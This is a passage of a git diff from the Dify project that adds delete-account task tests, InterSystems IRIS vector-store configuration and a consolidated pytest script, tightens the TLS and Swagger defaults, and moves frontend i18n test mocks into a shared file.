call_args[0][1] is None + + # Verify keyword arguments + assert call_args[1]["with_keywords"] is True + assert call_args[1]["delete_child_chunks"] is True diff --git a/api/tests/unit_tests/tasks/test_delete_account_task.py b/api/tests/unit_tests/tasks/test_delete_account_task.py new file mode 100644 index 0000000000..3b148e63f2 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_delete_account_task.py @@ -0,0 +1,112 @@ +""" +Unit tests for delete_account_task. + +Covers: +- Billing enabled with existing account: calls billing and sends success email +- Billing disabled with existing account: skips billing, sends success email +- Account not found: still calls billing when enabled, does not send email +- Billing deletion raises: logs and re-raises, no email +""" + +from types import SimpleNamespace +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.delete_account_task import delete_account_task + + +@pytest.fixture +def mock_db_session(): + """Mock the db.session used in delete_account_task.""" + with patch("tasks.delete_account_task.db.session") as mock_session: + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + yield mock_session + + +@pytest.fixture +def mock_deps(): + """Patch external dependencies: BillingService and send_deletion_success_task.""" + with ( + patch("tasks.delete_account_task.BillingService") as mock_billing, + patch("tasks.delete_account_task.send_deletion_success_task") as mock_mail_task, + ): + # ensure .delay exists on the mail task + mock_mail_task.delay = MagicMock() + yield { + "billing": mock_billing, + "mail_task": mock_mail_task, + } + + +def _set_account_found(mock_db_session, email: str = "user@example.com"): + account = SimpleNamespace(email=email) + mock_db_session.query.return_value.where.return_value.first.return_value = account + return account + + +def _set_account_missing(mock_db_session): + mock_db_session.query.return_value.where.return_value.first.return_value = None + + +class TestDeleteAccountTask: + def test_billing_enabled_account_exists_calls_billing_and_sends_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-123" + account = _set_account_found(mock_db_session, email="a@b.com") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_billing_disabled_account_exists_sends_email_only(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-456" + account = _set_account_found(mock_db_session, email="x@y.com") + + # Disable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", False): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_not_called() + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_account_not_found_billing_enabled_calls_billing_no_email(self, mock_db_session, mock_deps, caplog): + # Arrange + account_id = "missing-id" + _set_account_missing(mock_db_session) + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_not_called() + # Optional: verify log contains not found message + assert any("not found" in rec.getMessage().lower() for rec in caplog.records) + + def test_billing_delete_raises_propagates_and_no_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-err" + _set_account_found(mock_db_session, email="err@ex.com") + mock_deps["billing"].delete_account.side_effect = RuntimeError("billing down") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act & Assert + with pytest.raises(RuntimeError): + delete_account_task(account_id) + + # Ensure email was not sent + mock_deps["mail_task"].delay.assert_not_called() diff --git a/api/uv.lock b/api/uv.lock index 8cd49d057f..e6a6cf8ffc 100644 --- a/api/uv.lock +++ b/api/uv.lock @@ -1515,6 +1515,7 @@ vdb = [ { name = "clickzetta-connector-python" }, { name = "couchbase" }, { name = "elasticsearch" }, + { name = "intersystems-irispython" }, { name = "mo-vector" }, { name = "mysql-connector-python" }, { name = "opensearch-py" }, @@ -1711,6 +1712,7 @@ vdb = [ { name = "clickzetta-connector-python", specifier = ">=0.8.102" }, { name = "couchbase", specifier = "~=4.3.0" }, { name = "elasticsearch", specifier = "==8.14.0" }, + { name = "intersystems-irispython", specifier = ">=5.1.0" }, { name = "mo-vector", specifier = "~=0.1.13" }, { name = "mysql-connector-python", specifier = ">=9.3.0" }, { name = "opensearch-py", specifier = "==2.4.0" }, @@ -2918,6 +2920,18 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/cb/b1/3846dd7f199d53cb17f49cba7e651e9ce294d8497c8c150530ed11865bb8/iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12", size = 7484 }, ] +[[package]] +name = "intersystems-irispython" +version = "5.3.0" +source = { registry = "https://pypi.org/simple" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/5d/56/16d93576b50408d97a5cbbd055d8da024d585e96a360e2adc95b41ae6284/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-macosx_10_9_universal2.whl", hash = "sha256:59d3176a35867a55b1ab69a6b5c75438b460291bccb254c2d2f4173be08b6e55", size = 6594480, upload-time = "2025-10-09T20:47:27.629Z" }, + { url = "https://files.pythonhosted.org/packages/99/bc/19e144ee805ea6ee0df6342a711e722c84347c05a75b3bf040c5fbe19982/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56bccefd1997c25f9f9f6c4086214c18d4fdaac0a93319d4b21dd9a6c59c9e51", size = 14779928, upload-time = "2025-10-09T20:47:30.564Z" }, + { url = "https://files.pythonhosted.org/packages/e6/fb/59ba563a80b39e9450b4627b5696019aa831dce27dacc3831b8c1e669102/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3e160adc0785c55bb64e4264b8e99075691a15b0afa5d8d529f1b4bac7e57b81", size = 14422035, upload-time = "2025-10-09T20:47:32.552Z" }, + { url = "https://files.pythonhosted.org/packages/c1/68/ade8ad43f0ed1e5fba60e1710fa5ddeb01285f031e465e8c006329072e63/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win32.whl", hash = "sha256:820f2c5729119e5173a5bf6d6ac2a41275c4f1ffba6af6c59ea313ecd8f499cc", size = 2824316, upload-time = "2025-10-09T20:47:28.998Z" }, + { url = "https://files.pythonhosted.org/packages/f4/03/cd45cb94e42c01dc525efebf3c562543a18ee55b67fde4022665ca672351/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win_amd64.whl", hash = "sha256:fc07ec24bc50b6f01573221cd7d86f2937549effe31c24af8db118e0131e340c", size = 3463297, upload-time = "2025-10-09T20:47:34.636Z" }, +] + [[package]] name = "intervaltree" version = "3.1.0" diff --git a/dev/pytest/pytest_all_tests.sh b/dev/pytest/pytest_all_tests.sh deleted file mode 100755 index 9123b2f8ad..0000000000 --- a/dev/pytest/pytest_all_tests.sh +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -# ModelRuntime -dev/pytest/pytest_model_runtime.sh - -# Tools -dev/pytest/pytest_tools.sh - -# Workflow -dev/pytest/pytest_workflow.sh - -# Unit tests -dev/pytest/pytest_unit_tests.sh - -# TestContainers tests -dev/pytest/pytest_testcontainers.sh diff --git a/dev/pytest/pytest_artifacts.sh b/dev/pytest/pytest_artifacts.sh deleted file mode 100755 index 29cacdcc07..0000000000 --- a/dev/pytest/pytest_artifacts.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/artifact_tests/ diff --git a/dev/pytest/pytest_full.sh b/dev/pytest/pytest_full.sh new file mode 100755 index 0000000000..2989a74ad8 --- /dev/null +++ b/dev/pytest/pytest_full.sh @@ -0,0 +1,58 @@ +#!/bin/bash +set -euo pipefail +set -ex + +SCRIPT_DIR="$(dirname "$(realpath "$0")")" +cd "$SCRIPT_DIR/../.." + +PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" + +# Ensure OpenDAL local storage works even if .env isn't loaded +export STORAGE_TYPE=${STORAGE_TYPE:-opendal} +export OPENDAL_SCHEME=${OPENDAL_SCHEME:-fs} +export OPENDAL_FS_ROOT=${OPENDAL_FS_ROOT:-/tmp/dify-storage} +mkdir -p "${OPENDAL_FS_ROOT}" + +# Prepare env files like CI +cp -n docker/.env.example docker/.env || true +cp -n docker/middleware.env.example docker/middleware.env || true +cp -n api/tests/integration_tests/.env.example api/tests/integration_tests/.env || true + +# Expose service ports (same as CI) without leaving the repo dirty +EXPOSE_BACKUPS=() +for f in docker/docker-compose.yaml docker/tidb/docker-compose.yaml; do + if [[ -f "$f" ]]; then + cp "$f" "$f.ci.bak" + EXPOSE_BACKUPS+=("$f") + fi +done +if command -v yq >/dev/null 2>&1; then + sh .github/workflows/expose_service_ports.sh || true +else + echo "skip expose_service_ports (yq not installed)" >&2 +fi + +# Optionally start middleware stack (db, redis, sandbox, ssrf proxy) to mirror CI +STARTED_MIDDLEWARE=0 +if [[ "${SKIP_MIDDLEWARE:-0}" != "1" ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env up -d db_postgres redis sandbox ssrf_proxy + STARTED_MIDDLEWARE=1 + # Give services a moment to come up + sleep 5 +fi + +cleanup() { + if [[ $STARTED_MIDDLEWARE -eq 1 ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env down + fi + for f in "${EXPOSE_BACKUPS[@]}"; do + mv "$f.ci.bak" "$f" + done +} +trap cleanup EXIT + +pytest --timeout "${PYTEST_TIMEOUT}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests diff --git a/dev/pytest/pytest_model_runtime.sh b/dev/pytest/pytest_model_runtime.sh deleted file mode 100755 index fd68dbe697..0000000000 --- a/dev/pytest/pytest_model_runtime.sh +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/model_runtime/anthropic \ - api/tests/integration_tests/model_runtime/azure_openai \ - api/tests/integration_tests/model_runtime/openai api/tests/integration_tests/model_runtime/chatglm \ - api/tests/integration_tests/model_runtime/google api/tests/integration_tests/model_runtime/xinference \ - api/tests/integration_tests/model_runtime/huggingface_hub/test_llm.py \ - api/tests/integration_tests/model_runtime/upstage \ - api/tests/integration_tests/model_runtime/fireworks \ - api/tests/integration_tests/model_runtime/nomic \ - api/tests/integration_tests/model_runtime/mixedbread \ - api/tests/integration_tests/model_runtime/voyage diff --git a/dev/pytest/pytest_testcontainers.sh b/dev/pytest/pytest_testcontainers.sh deleted file mode 100755 index f92f8821bf..0000000000 --- a/dev/pytest/pytest_testcontainers.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/test_containers_integration_tests diff --git a/dev/pytest/pytest_tools.sh b/dev/pytest/pytest_tools.sh deleted file mode 100755 index 989784f078..0000000000 --- a/dev/pytest/pytest_tools.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/tools diff --git a/dev/pytest/pytest_workflow.sh b/dev/pytest/pytest_workflow.sh deleted file mode 100755 index 941c8d3e7e..0000000000 --- a/dev/pytest/pytest_workflow.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/workflow diff --git a/docker/.env.example b/docker/.env.example index 04088b72a8..94b9d180b0 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -518,7 +518,7 @@ SUPABASE_URL=your-server-url # ------------------------------ # The type of vector store to use. -# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`. +# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`, `iris`. VECTOR_STORE=weaviate # Prefix used to create collection name in vector database VECTOR_INDEX_NAME_PREFIX=Vector_index @@ -792,6 +792,21 @@ CLICKZETTA_ANALYZER_TYPE=chinese CLICKZETTA_ANALYZER_MODE=smart CLICKZETTA_VECTOR_DISTANCE_FUNCTION=cosine_distance +# InterSystems IRIS configuration, only available when VECTOR_STORE is `iris` +IRIS_HOST=iris +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en +IRIS_TIMEZONE=UTC + # ------------------------------ # Knowledge Configuration # ------------------------------ @@ -1214,7 +1229,7 @@ NGINX_SSL_PORT=443 # and modify the env vars below accordingly. NGINX_SSL_CERT_FILENAME=dify.crt NGINX_SSL_CERT_KEY_FILENAME=dify.key -NGINX_SSL_PROTOCOLS=TLSv1.1 TLSv1.2 TLSv1.3 +NGINX_SSL_PROTOCOLS=TLSv1.2 TLSv1.3 # Nginx performance tuning NGINX_WORKER_PROCESSES=auto @@ -1406,7 +1421,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -SWAGGER_UI_ENABLED=true +SWAGGER_UI_ENABLED=false SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) @@ -1433,5 +1448,16 @@ WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK=0 # Tenant isolated task queue configuration TENANT_ISOLATED_TASK_CONCURRENCY=1 +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + # The API key of amplitude -AMPLITUDE_API_KEY= +AMPLITUDE_API_KEY= \ No newline at end of file diff --git a/docker/docker-compose-template.yaml b/docker/docker-compose-template.yaml index b12d06ca97..4f6194b9e4 100644 --- a/docker/docker-compose-template.yaml +++ b/docker/docker-compose-template.yaml @@ -414,7 +414,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -648,6 +648,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index 825f0650c8..5c53788234 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -361,6 +361,19 @@ x-shared-env: &shared-api-worker-env CLICKZETTA_ANALYZER_TYPE: ${CLICKZETTA_ANALYZER_TYPE:-chinese} CLICKZETTA_ANALYZER_MODE: ${CLICKZETTA_ANALYZER_MODE:-smart} CLICKZETTA_VECTOR_DISTANCE_FUNCTION: ${CLICKZETTA_VECTOR_DISTANCE_FUNCTION:-cosine_distance} + IRIS_HOST: ${IRIS_HOST:-iris} + IRIS_SUPER_SERVER_PORT: ${IRIS_SUPER_SERVER_PORT:-1972} + IRIS_WEB_SERVER_PORT: ${IRIS_WEB_SERVER_PORT:-52773} + IRIS_USER: ${IRIS_USER:-_SYSTEM} + IRIS_PASSWORD: ${IRIS_PASSWORD:-Dify@1234} + IRIS_DATABASE: ${IRIS_DATABASE:-USER} + IRIS_SCHEMA: ${IRIS_SCHEMA:-dify} + IRIS_CONNECTION_URL: ${IRIS_CONNECTION_URL:-} + IRIS_MIN_CONNECTION: ${IRIS_MIN_CONNECTION:-1} + IRIS_MAX_CONNECTION: ${IRIS_MAX_CONNECTION:-3} + IRIS_TEXT_INDEX: ${IRIS_TEXT_INDEX:-true} + IRIS_TEXT_INDEX_LANGUAGE: ${IRIS_TEXT_INDEX_LANGUAGE:-en} + IRIS_TIMEZONE: ${IRIS_TIMEZONE:-UTC} UPLOAD_FILE_SIZE_LIMIT: ${UPLOAD_FILE_SIZE_LIMIT:-15} UPLOAD_FILE_BATCH_LIMIT: ${UPLOAD_FILE_BATCH_LIMIT:-5} UPLOAD_FILE_EXTENSION_BLACKLIST: ${UPLOAD_FILE_EXTENSION_BLACKLIST:-} @@ -515,7 +528,7 @@ x-shared-env: &shared-api-worker-env NGINX_SSL_PORT: ${NGINX_SSL_PORT:-443} NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -618,7 +631,7 @@ x-shared-env: &shared-api-worker-env QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200} QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-} QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30} - SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true} + SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false} SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html} DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true} DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0} @@ -635,6 +648,12 @@ x-shared-env: &shared-api-worker-env WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE: ${WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE:-100} WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK: ${WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK:-0} TENANT_ISOLATED_TASK_CONCURRENCY: ${TENANT_ISOLATED_TASK_CONCURRENCY:-1} + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: ${ANNOTATION_IMPORT_FILE_SIZE_LIMIT:-2} + ANNOTATION_IMPORT_MAX_RECORDS: ${ANNOTATION_IMPORT_MAX_RECORDS:-10000} + ANNOTATION_IMPORT_MIN_RECORDS: ${ANNOTATION_IMPORT_MIN_RECORDS:-1} + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:-5} + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:-20} + ANNOTATION_IMPORT_MAX_CONCURRENT: ${ANNOTATION_IMPORT_MAX_CONCURRENT:-5} AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} services: @@ -1052,7 +1071,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -1286,6 +1305,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/iris/docker-entrypoint.sh b/docker/iris/docker-entrypoint.sh new file mode 100755 index 0000000000..067bfa03e2 --- /dev/null +++ b/docker/iris/docker-entrypoint.sh @@ -0,0 +1,38 @@ +#!/bin/bash +set -e + +# IRIS configuration flag file +IRIS_CONFIG_DONE="/opt/iris/.iris-configured" + +# Function to configure IRIS +configure_iris() { + echo "Configuring IRIS for first-time setup..." + + # Wait for IRIS to be fully started + sleep 5 + + # Execute the initialization script + iris session IRIS < /iris-init.script + + # Mark configuration as done + touch "$IRIS_CONFIG_DONE" + + echo "IRIS configuration completed." +} + +# Start IRIS in background for initial configuration if not already configured +if [ ! -f "$IRIS_CONFIG_DONE" ]; then + echo "First-time IRIS setup detected. Starting IRIS for configuration..." + + # Start IRIS + iris start IRIS + + # Configure IRIS + configure_iris + + # Stop IRIS + iris stop IRIS quietly +fi + +# Run the original IRIS entrypoint +exec /iris-main "$@" diff --git a/docker/iris/iris-init.script b/docker/iris/iris-init.script new file mode 100644 index 0000000000..c41fcf4efb --- /dev/null +++ b/docker/iris/iris-init.script @@ -0,0 +1,11 @@ +// Switch to the %SYS namespace to modify system settings +set $namespace="%SYS" + +// Set predefined user passwords to never expire (default password: SYS) +Do ##class(Security.Users).UnExpireUserPasswords("*") + +// Change the default password  +Do $SYSTEM.Security.ChangePassword("_SYSTEM","Dify@1234") + +// Install the Japanese locale (default is English since the container is Ubuntu-based) +// Do ##class(Config.NLS.Locales).Install("jpuw") diff --git a/.cursorrules b/web/AGENTS.md similarity index 61% rename from .cursorrules rename to web/AGENTS.md index cdfb8b17a3..7362cd51db 100644 --- a/.cursorrules +++ b/web/AGENTS.md @@ -1,6 +1,5 @@ -# Cursor Rules for Dify Project - ## Automated Test Generation - Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests. - When proposing or saving tests, re-read that document and follow every requirement. +- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance. diff --git a/web/CLAUDE.md b/web/CLAUDE.md new file mode 120000 index 0000000000..47dc3e3d86 --- /dev/null +++ b/web/CLAUDE.md @@ -0,0 +1 @@ +AGENTS.md \ No newline at end of file diff --git a/web/__mocks__/react-i18next.ts b/web/__mocks__/react-i18next.ts new file mode 100644 index 0000000000..1e3f58927e --- /dev/null +++ b/web/__mocks__/react-i18next.ts @@ -0,0 +1,40 @@ +/** + * Shared mock for react-i18next + * + * Jest automatically uses this mock when react-i18next is imported in tests. + * The default behavior returns the translation key as-is, which is suitable + * for most test scenarios. + * + * For tests that need custom translations, you can override with jest.mock(): + * + * @example + * jest.mock('react-i18next', () => ({ + * useTranslation: () => ({ + * t: (key: string) => { + * if (key === 'some.key') return 'Custom translation' + * return key + * }, + * }), + * })) + */ + +export const useTranslation = () => ({ + t: (key: string, options?: Record) => { + if (options?.returnObjects) + return [`${key}-feature-1`, `${key}-feature-2`] + if (options) + return `${key}:${JSON.stringify(options)}` + return key + }, + i18n: { + language: 'en', + changeLanguage: jest.fn(), + }, +}) + +export const Trans = ({ children }: { children?: React.ReactNode }) => children + +export const initReactI18next = { + type: '3rdParty', + init: jest.fn(), +} diff --git a/web/__tests__/embedded-user-id-auth.test.tsx b/web/__tests__/embedded-user-id-auth.test.tsx index 5c3c3c943f..9d6734b120 100644 --- a/web/__tests__/embedded-user-id-auth.test.tsx +++ b/web/__tests__/embedded-user-id-auth.test.tsx @@ -4,12 +4,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react' import MailAndPasswordAuth from '@/app/(shareLayout)/webapp-signin/components/mail-and-password-auth' import CheckCode from '@/app/(shareLayout)/webapp-signin/check-code/page' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - const replaceMock = jest.fn() const backMock = jest.fn() diff --git a/web/__tests__/goto-anything/command-selector.test.tsx b/web/__tests__/goto-anything/command-selector.test.tsx index 6d4e045d49..e502c533bb 100644 --- a/web/__tests__/goto-anything/command-selector.test.tsx +++ b/web/__tests__/goto-anything/command-selector.test.tsx @@ -4,12 +4,6 @@ import '@testing-library/jest-dom' import CommandSelector from '../../app/components/goto-anything/command-selector' import type { ActionItem } from '../../app/components/goto-anything/actions/types' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - jest.mock('cmdk', () => ({ Command: { Group: ({ children, className }: any) =>
{children}
, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx index b1e915b2bf..374dbff203 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx @@ -3,13 +3,6 @@ import { render } from '@testing-library/react' import '@testing-library/jest-dom' import { OpikIconBig } from '@/app/components/base/icons/src/public/tracing' -// Mock dependencies to isolate the SVG rendering issue -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - describe('SVG Attribute Error 